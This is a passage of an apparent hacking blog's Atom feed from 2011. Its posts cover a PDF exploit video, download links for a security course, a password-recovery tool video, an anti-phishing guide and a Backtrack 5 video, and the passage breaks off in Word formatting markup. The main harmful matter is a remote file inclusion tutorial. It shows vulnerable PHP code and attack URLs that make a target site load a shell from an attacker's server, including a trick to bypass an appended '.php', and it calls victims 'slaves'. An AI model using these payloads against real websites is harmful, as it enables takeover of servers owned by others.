href='http://darkirggs.blogspot.com/2011/05/how-to-spread-bots-600-bots-in-3-days.html' title='How To Spread Bots. 600 bots in 3 days!!!!!!'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-1832749278248435160</id><published>2011-05-23T14:59:00.000+05:30</published><updated>2011-05-23T14:59:22.501+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Backtrack"/><category scheme="http://www.blogger.com/atom/ns#" term="Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Metasploit"/><title type='text'>owning computer with adobe pdf 9.3.0 exploit :)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/upWylWML5Nw?feature=player_embedded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/1832749278248435160/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/owning-computer-with-adobe-pdf-930.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/1832749278248435160'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/1832749278248435160'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/owning-computer-with-adobe-pdf-930.html' title='owning computer with adobe pdf 9.3.0 exploit :)'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-8653293574799977322</id><published>2011-05-23T10:37:00.000+05:30</published><updated>2011-05-23T10:37:35.214+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Live CD"/><title type='text'>SANS SECURITY 560 Network Penetration Testing &amp; Ethical Hacking</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://www.freeimagehosting.net/uploads/dd48fb6679.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://www.freeimagehosting.net/uploads/dd48fb6679.gif&quot; width=&quot;275&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
SANS SECURITY 560 Network Penetration Testing &amp;amp; Ethical Hacking | 1.5 GB&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;SANS Security 560 is one of the most technically rigorous courses offered by the SANS Institute. Attendees are expected to have a working knowledge of TCP/IP, cryptographic routines such as DES, AES, and MD5, and the Windows and Linux command lines before they step into class. Although SANS Security 401 (Security Essentials) and then next SANS Security 504 (Hacker Techniques, Exploits, and Incident Handling) are not pre-requisites for 560, these courses cover the groundwork that all 560 attendees are expected to know. While 560 is technically in-depth, it is important to note that programming knowledge is NOT required for the course.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Download:&lt;/b&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2Sq&quot;&gt;http://adf.ly/1a2Sq&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2Sr&quot;&gt;http://adf.ly/1a2Sr&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2Ss&quot;&gt;http://adf.ly/1a2Ss&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2St&quot;&gt;http://adf.ly/1a2St&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2Su&quot;&gt;http://adf.ly/1a2Su&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2Sv&quot;&gt;http://adf.ly/1a2Sv&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2Sw&quot;&gt;http://adf.ly/1a2Sw&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2Sx&quot;&gt;http://adf.ly/1a2Sx&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2Sy&quot;&gt;http://adf.ly/1a2Sy&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2Sz&quot;&gt;http://adf.ly/1a2Sz&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2T0&quot;&gt;http://adf.ly/1a2T0&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2T1&quot;&gt;http://adf.ly/1a2T1&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2T2&quot;&gt;http://adf.ly/1a2T2&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/1a2T3&quot;&gt;http://adf.ly/1a2T3&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/8653293574799977322/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/sans-security-560-network-penetration.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/8653293574799977322'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/8653293574799977322'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/sans-security-560-network-penetration.html' title='SANS SECURITY 560 Network Penetration Testing &amp; Ethical Hacking'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-8039588447398199366</id><published>2011-05-20T18:18:00.000+05:30</published><updated>2011-05-20T18:18:49.953+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="RFI"/><title type='text'>RFI = Remote File Inclusion</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&amp;nbsp;Basically RFI is a method of getting your cleverly coded PHP shell onto a server. First off we will take a look at the code that allows us to use this vulnerability.&lt;br /&gt;
&lt;blockquote&gt;&amp;lt;?php&lt;br /&gt;
&amp;nbsp;$page = $_GET[&#39;page&#39;];&lt;br /&gt;
&amp;nbsp;include($page);&lt;br /&gt;
&amp;nbsp;?&amp;gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/blockquote&gt;&amp;nbsp;This code can be arranged several different ways, but it comes down to not limiting user input. To eliminate this problem, use a switch statement to make sure they can only choose the ones given.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;But, since you cannot view the PHP to a webpage, we are going to have to detect it some other way. To do this, the targets URL must look something like this;&lt;br /&gt;
&lt;blockquote&gt;http://www.slave.com/index.php?page=main.php&lt;/blockquote&gt;&amp;nbsp;The &quot;?page&quot; can be replace with any sort of variable really. If the site URL looks like this, they might be vulnerable to RFI.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Try manipulating the page variable to be something else such as;&lt;br /&gt;
&lt;blockquote&gt;http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt&lt;/blockquote&gt;&amp;nbsp;You can replace the &quot;http://www.yoursite.com/yourshell.txt&quot; with a shell of your choice. If it doesn&#39;t work, there is a way you can possibly fix it.&lt;br /&gt;
&amp;nbsp;The code might look something like this;&lt;br /&gt;
&lt;blockquote&gt;&amp;lt;?php&lt;br /&gt;
&amp;nbsp;&amp;nbsp; $file =$_GET[&#39;page&#39;];&lt;br /&gt;
&amp;nbsp;&amp;nbsp; include($file .&quot;.php&quot;);&lt;br /&gt;
&amp;nbsp;?&amp;gt;&lt;/blockquote&gt;&amp;nbsp;This makes whatever is inputted to be treated as a PHP file. If this happens, your shell will not execute. For any shell to work, it must be in &quot;.txt&quot; form.&lt;br /&gt;
&amp;nbsp;To eliminate this nuisance, we modify our URL manipulation slightly to look like this;&lt;br /&gt;
&lt;blockquote&gt;http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt?&lt;/blockquote&gt;&amp;nbsp;The &quot;?&quot; at the end, makes it so that the shell does not get all fucked up by the &quot;.txt.php&quot; crap at the end, and your final URL will look like this;&lt;br /&gt;
&lt;blockquote&gt;http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt?.php&lt;/blockquote&gt;&amp;nbsp;Which makes it so that the &quot;.php&quot; does not screw up your shell&lt;br /&gt;
&amp;nbsp;=========================================================&lt;br /&gt;
&lt;br /&gt;
Credits: &lt;a href=&quot;http://adf.ly/1NP9w&quot;&gt;Vlatko from Hackforums&lt;/a&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/8039588447398199366/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/rfi-remote-file-inclusion.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/8039588447398199366'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/8039588447398199366'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/rfi-remote-file-inclusion.html' title='RFI = Remote File Inclusion'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-3383246329060198037</id><published>2011-05-17T12:30:00.001+05:30</published><updated>2011-05-17T12:32:45.382+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Phishing"/><title type='text'>Recovering Google Account Password Using Google Password Decryptor</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/DPt-6yO7yaY?feature=player_embedded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;br /&gt;
Description: This video is on &lt;a href=&quot;http://adf.ly/1XLkU&quot;&gt;GooglePasswordDecryptor&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
It shows how to use GooglePasswordDecryptor to instantly recover the Google Password from popular web browsers &amp;amp; messengers using both GUI &amp;amp; Command-Line interface.&lt;br /&gt;
&lt;br /&gt;
This video is created by Preetam - one of the main contributor &amp;amp; forum moderator on SecurityXploded.com&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/3383246329060198037/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/recovering-google-account-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/3383246329060198037'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/3383246329060198037'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/recovering-google-account-password.html' title='Recovering Google Account Password Using Google Password Decryptor'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-274849488528237268</id><published>2011-05-17T01:25:00.000+05:30</published><updated>2011-05-17T01:25:52.574+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Phishing"/><title type='text'>How to protect yourself against phishing</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;1. What is phishing?&lt;/b&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Phishing is the method of stealing login info(usernames and passwords) by directing the slave to a clone(fake) login page, that logs the login info without the knowledge of the slave.&lt;/li&gt;
&lt;li&gt;Such clone website is known as a &lt;b&gt;phisher&lt;/b&gt;.&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;2. How to protect yourself against phishing?&lt;/b&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;b&gt;Use your login info in the correct places only&lt;/b&gt; - Don&#39;t ever put your login info anywhere else than the page you registered to, unless it&#39;s a trusted service you know(such as youtube or blogger asking for your google account&#39;s info).&lt;/li&gt;
&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;b&gt;Make sure the website you&#39;re logging in isn&#39;t fake&lt;/b&gt; - Whenever you login to a website, if you didn&#39;t type the URL(address) of the website yourself, i.e. if you clicked a link that led you to the login page(from message, website, search engine results), always check the url(address) to see if you&#39;re in the right place. For instance, if you&#39;re logging in your facebook account, make sure the url appears as &lt;a href=&quot;http://www.facebook.com/&quot;&gt;http://www.facebook.com/&lt;/a&gt;... Where a phisher page would look like &lt;a href=&quot;http://www.facebook.freewebs.com/&quot;&gt;http://www.facebook.freewebs.com/&lt;/a&gt;... or &lt;a href=&quot;http://www.facebook.spam.com/&quot;&gt;http://www.facebook.spam.com/&lt;/a&gt;... or any url whose part before the .com isn&#39;t exactly the same as the page you want to login to.&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;b&gt;Make sure the links you&#39;re clicking aren&#39;t fake&lt;/b&gt; - Whenever you&#39;re clicking a link, check where the link goes before clicking it. Links can be masked to appear as something else than the page they&#39;re leading to. For example, &lt;a href=&quot;http://www.google.com/&quot;&gt;www.google.com&lt;/a&gt; leads to yahoo instead of google. Fortunately, in most browsers, whenever you point your mouse cursor over the link, the true location of the link is displayed on the bottom left part of the screen. Try it with the above link. This is particularly important because it can protect you from another, rarer but more dangerous method called &lt;b&gt;cookie stealing&lt;/b&gt;, which is basically automatically stealing your account if you&#39;re previously logged in the website.&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Know that links to phishing pages are usually spread via email, and often represent impersonating trusted services and persons, such as making the email appear as it&#39;s sent from the website you&#39;ve registered to, or a friend of yours whose account has been compromised.&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;3. What to do if you have spotted a phisher?&lt;/b&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Report the phisher as soon as you can. &lt;/li&gt;
&lt;li&gt;Report the phisher&#39;s address here: &lt;a href=&quot;http://www.google.com/safebrowsing/report_phish/&quot;&gt;http://www.google.com/safebrowsing/report_phish/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;If the phishing attempt has been done via message, report the message in any of the following services:&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.reportphish.org/forwardphish.php&quot;&gt;http://www.reportphish.org/forwardphish.php&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.reportphish.org/forwardphish.php&quot;&gt;http://www.reportphish.org/forwardphish.php&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://www.us-cert.gov/nav/report_phishing.html&quot;&gt;http://www.us-cert.gov/nav/report_phishing.html&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;If you received the message from a friend&#39;s compromised account, inform your friend, and other friends that might be in danger.&lt;/li&gt;
&lt;li&gt;If possible, inform the admin of the website/forum that the phisher is made for.&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
Credit: &lt;a href=&quot;http://adf.ly/1NP9w&quot;&gt;Crow from Hackforums&lt;/a&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/274849488528237268/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/how-to-protect-yourself-against.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/274849488528237268'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/274849488528237268'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/how-to-protect-yourself-against.html' title='How to protect yourself against phishing'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-1457257172327135517</id><published>2011-05-16T11:12:00.000+05:30</published><updated>2011-05-16T11:12:42.968+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Encryption"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Live CD"/><title type='text'>Backtrack 5</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/f3-RjOE-pfI?feature=player_embedded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://darkirggs.blogspot.com/feeds/1457257172327135517/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://darkirggs.blogspot.com/2011/05/backtrack-5.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/1457257172327135517'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5072739973047119603/posts/default/1457257172327135517'/><link rel='alternate' type='text/html' href='http://darkirggs.blogspot.com/2011/05/backtrack-5.html' title='Backtrack 5'/><author><name>Darkirggs</name><uri>http://www.blogger.com/profile/00121219233394405174</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5072739973047119603.post-3020940383138485550</id><published>2011-05-16T02:41:00.000+05:30</published><updated>2011-05-16T02:41:15.096+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Basic Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Decryption"/><category scheme="http://www.blogger.com/atom/ns#" term="Encryption"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks"/><title type='text'>Hide Like a Hacker</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:WordDocument&gt;   &lt;w:View&gt;Normal&lt;/w:View&gt;   &lt;w:Zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:TrackMoves/&gt;   &lt;w:TrackFormatting/&gt;   &lt;w:PunctuationKerning/&gt;   &lt;w:ValidateAgainstSchemas/&gt;   &lt;w:SaveIfXMLInvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:IgnoreMixedContent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:AlwaysShowPlaceholderText&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:DoNotPromoteQF/&gt;   &lt;w:LidThemeOther&gt;EN-US&lt;/w:LidThemeOther&gt;   &lt;w:LidThemeAsian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:LidThemeComplexScript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:Compatibility&gt;    &lt;w:BreakWrappedTables/&gt;    &lt;w:SnapToGridInCell/&gt;    &lt;w:WrapTextWithPunct/&gt;    &lt;w:UseAsianBreakRules/&gt;    &lt;w:DontGrowAutofit/&gt;    &lt;w:SplitPgBreakAndParaMark/&gt;    &lt;w:DontVertAlignCellWithSp/&gt;    &lt;w:DontBreakConstrainedForcedTables/&gt;    &lt;w:DontVertAlignInTxbx/&gt;    &lt;w:Word11KerningPairs/&gt;    &lt;w:CachedColBalance/&gt;   &lt;/w:Compatibility&gt;   &lt;m:mathPr&gt;    &lt;m:mathFont m:val=&quot;Cambria Math&quot;/&gt;    &lt;m:brkBin m:val=&quot;before&quot;/&gt;    &lt;m:brkBinSub m:val=&quot;--&quot;/&gt;    &lt;m:smallFrac m:val=&quot;off&quot;/&gt;    &lt;m:dispDef/&gt;    &lt;m:lMargin m:val=&quot;0&quot;/&gt;    &lt;m:rMargin m:val=&quot;0&quot;/&gt;    &lt;m:defJc m:val=&quot;centerGroup&quot;/&gt;    &lt;m:wrapIndent m:val=&quot;1440&quot;/&gt;    &lt;m:intLim m:val=&quot;subSup&quot;/&gt;    &lt;m:naryLim m:val=&quot;undOvr&quot;/&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:LatentStyles DefLockedState=&quot;false&quot; DefUnhideWhenUsed=&quot;true&quot;
  DefSemiHidden=&quot;true&quot; DefQFormat=&quot;false&quot; DefPriority=&quot;99&quot;
  LatentStyleCount=&quot;267&quot;&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;0&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Normal&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;heading 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 7&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 8&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;9&quot; QFormat=&quot;true&quot; Name=&quot;heading 9&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 1&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 2&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 3&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 4&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 5&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 6&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 7&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 8&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;toc 9&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;35&quot; QFormat=&quot;true&quot; Name=&quot;caption&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;10&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Title&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; Name=&quot;Default Paragraph Font&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;11&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Subtitle&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;22&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Strong&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;20&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;Emphasis&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;59&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Table Grid&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; UnhideWhenUsed=&quot;false&quot; Name=&quot;Placeholder Text&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; QFormat=&quot;true&quot; Name=&quot;No Spacing&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Shading&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light List&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; SemiHidden=&quot;false&quot;
   UnhideWhenUsed=&quot;false&quot; Name=&quot;Light Grid&quot;/&gt;   &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; SemiHidden=&quot;false&quot;
